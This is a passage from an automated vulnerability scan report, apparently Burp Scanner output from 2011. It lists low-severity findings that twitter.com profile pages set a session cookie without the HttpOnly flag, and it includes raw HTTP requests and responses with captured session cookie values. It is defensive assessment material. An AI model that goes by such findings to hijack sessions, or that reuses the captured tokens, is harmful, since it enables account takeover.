Path:   /Jarvis_Green

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Jarvis_Green HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265288-56506-41031
ETag: "1fbdd011dd022432b9be5211b927eb5e"
Last-Modified: Sat, 29 Jan 2011 01:41:28 GMT
X-Runtime: 0.00821
Content-Type: text/html; charset=utf-8
Content-Length: 29885
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.29. http://twitter.com/JennyMcCarthy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /JennyMcCarthy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JennyMcCarthy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266001-863-44101
ETag: "f38aec6749f0462266c3dd505da4c784"
Last-Modified: Sat, 29 Jan 2011 01:53:22 GMT
X-Runtime: 0.01378
Content-Type: text/html; charset=utf-8
Content-Length: 49671
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.30. http://twitter.com/John_W_Henry

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /John_W_Henry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /John_W_Henry HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266003-90291-22061
ETag: "39b5637104095258c2612985611f2081"
Last-Modified: Sat, 29 Jan 2011 01:53:23 GMT
X-Runtime: 0.00864
Content-Type: text/html; charset=utf-8
Content-Length: 40419
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.31. http://twitter.com/KaseyRKahl

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /KaseyRKahl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KaseyRKahl HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265968-89789-38719
ETag: "91cc7fb3c644ed10961b8761bb947762"
Last-Modified: Sat, 29 Jan 2011 01:52:48 GMT
X-Runtime: 0.01025
Content-Type: text/html; charset=utf-8
Content-Length: 50928
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.32. http://twitter.com/KhloeKardashian

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /KhloeKardashian

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KhloeKardashian HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266008-48453-14084
ETag: "a10b004421cd49a7bf1036242f788900"
Last-Modified: Sat, 29 Jan 2011 01:53:28 GMT
X-Runtime: 0.01326
Content-Type: text/html; charset=utf-8
Content-Length: 52081
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.33. http://twitter.com/KimKardashian

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /KimKardashian

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KimKardashian HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:58 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266038-98911-11256
ETag: "162e94dddb4eb4f4491a26acce7fb49a"
Last-Modified: Sat, 29 Jan 2011 01:53:58 GMT
X-Runtime: 0.37290
Content-Type: text/html; charset=utf-8
Content-Length: 49623
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIiVodHRwOi8vdHdpdHRlci5jb20vS2ltS2FyZGFz%250AaGlhbjoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dd57a4fe4c4e017cb678d4f77a9a59706b7869bb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.34. http://twitter.com/Late_Show

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Late_Show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Late_Show HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265286-91074-55312
ETag: "7b5d59ba88764ae8de6aa055d6a61048"
Last-Modified: Sat, 29 Jan 2011 01:41:26 GMT
X-Runtime: 0.00803
Content-Type: text/html; charset=utf-8
Content-Length: 39032
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.35. http://twitter.com/LibertyHotel

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /LibertyHotel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LibertyHotel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-37638-22569
ETag: "6f06fb302d73fdde5809f33e541f4c86"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01451
Content-Type: text/html; charset=utf-8
Content-Length: 48481
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.36. http://twitter.com/Michael_Joseph

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Michael_Joseph

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Michael_Joseph HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224739-65021-17900
ETag: "4ee6993dd58f48089b6cdab2133559a8"
Last-Modified: Fri, 28 Jan 2011 14:25:39 GMT
X-Runtime: 0.01172
Content-Type: text/html; charset=utf-8
Content-Length: 51377
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.37. http://twitter.com/Michael_Joseph/status/30390775099424770

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30390775099424770

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Michael_Joseph/status/30390775099424770 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
